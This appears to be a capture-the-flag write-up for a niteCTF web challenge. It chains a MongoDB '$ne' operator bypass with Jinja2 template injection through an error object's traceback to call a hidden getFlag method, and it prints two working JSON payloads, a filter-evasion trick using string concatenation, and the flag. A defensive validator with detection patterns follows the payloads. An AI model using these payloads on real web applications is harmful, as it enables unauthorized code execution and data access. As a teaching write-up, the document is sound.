niteCTF web/Charlie Hunt 1

My solution for the niteCTF web/Charlie Hunt 1 challenge.

Challenge overview

The challenge presents a web application with an API endpoint /api/v1/review that accepts POST requests. The goal is to exploit a template injection vulnerability to retrieve a flag.

Analysis

  1. The endpoint /api/v1/review accepts a JSON body with two key fields:
    • stars: carries the MongoDB operator {"$ne": null}, which bypasses the check on the star value
    • __v: carries the template injection payload

Exploitation

There are two successful approaches:

  1. Method discovery

    {
      "stars": {"$ne": null},
      "__v": "{{ e|attr('__traceback__')|attr('tb_frame')|attr('f_locals')|attr('get')('self')|attr(('__c' ~ 'la' ~ 'ss__'))|attr(('__d' ~ 'i' ~ 'ct__'))|attr('keys')() }}"
    }

  2. Direct flag retrieval

    {
      "stars": {"$ne": null},
      "__v": "{{ e|attr('__traceback__')|attr('tb_frame')|attr('f_locals')|attr('get')('self')|attr('getFlag')() }}"
    }

The exploit works by:

  • using the error object e, which is available in the template context, to reach its traceback
  • traversing the traceback frame's locals to obtain the self reference of the handler
  • calling the getFlag() method on it, or listing its class dictionary keys to discover available methods
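As an added defensive example (not part of the original writeup and not the challenge's own code), the Python below shows the server-side validation a hardened /api/v1/review handler would apply to the two fields above, plus a detection helper that tags request bodies carrying the same indicators; the request bodies are constructed, and the 1 to 5 range for stars is an assumption about the application.

```python
import json
import re

# Constructed sample request bodies (not captured from the challenge service).
SAMPLE_BODIES = [
    '{"stars": 5, "__v": "great coffee"}',
    '{"stars": {"$ne": null}, "__v": "{{ e|attr(\'__traceback__\') }}"}',
    '{"stars": 4, "__v": "{% for x in y %}{% endfor %}"}',
]

# Jinja2 statement and expression delimiters.
TEMPLATE_SYNTAX = re.compile(r"\{\{|\{%|\}\}|%\}")


def contains_operator_keys(value):
    """Recursively detect MongoDB operator keys such as {"$ne": null}."""
    if isinstance(value, dict):
        return any(str(k).startswith("$") or contains_operator_keys(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator_keys(v) for v in value)
    return False


def validate_review(body):
    """Return (ok, reason). stars must be a plain integer (assumed range 1..5),
    and no object in the body may carry operator keys, so a query like
    {"stars": {"$ne": null}} can never reach the database. __v is treated as
    free text; the real fix is to pass it to the template as a variable instead
    of rendering it as template source, with the delimiter check as defense in depth."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return False, "invalid json"
    if not isinstance(data, dict):
        return False, "body must be an object"
    if contains_operator_keys(data):
        return False, "operator keys are not allowed"
    stars = data.get("stars")
    if isinstance(stars, bool) or not isinstance(stars, int) or not 1 <= stars <= 5:
        return False, "stars must be an integer between 1 and 5"
    text = data.get("__v", "")
    if not isinstance(text, str) or TEMPLATE_SYNTAX.search(text):
        return False, "template syntax in __v"
    return True, "ok"


def flag_suspicious(body):
    """Detection: tag a raw request body with the indicators it matches, for logging."""
    tags = []
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        data = None
    if data is not None and contains_operator_keys(data):
        tags.append("mongo-operator")
    if TEMPLATE_SYNTAX.search(body):
        tags.append("template-syntax")
    return tags
```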

Flag

Flag:
nite{3rror5_can_b3_u53ful_s0m3t1m35}

Key takeaways

  1. Error objects exposed in the template context can be leveraged for SSTI exploitation.
  2. Template engines that expose internal Python attributes are particularly vulnerable.
  3. Building attribute names with string concatenation (~) can help bypass filters that match on literal names such as __class__.

This post is licensed under CC BY 4.0 by the author.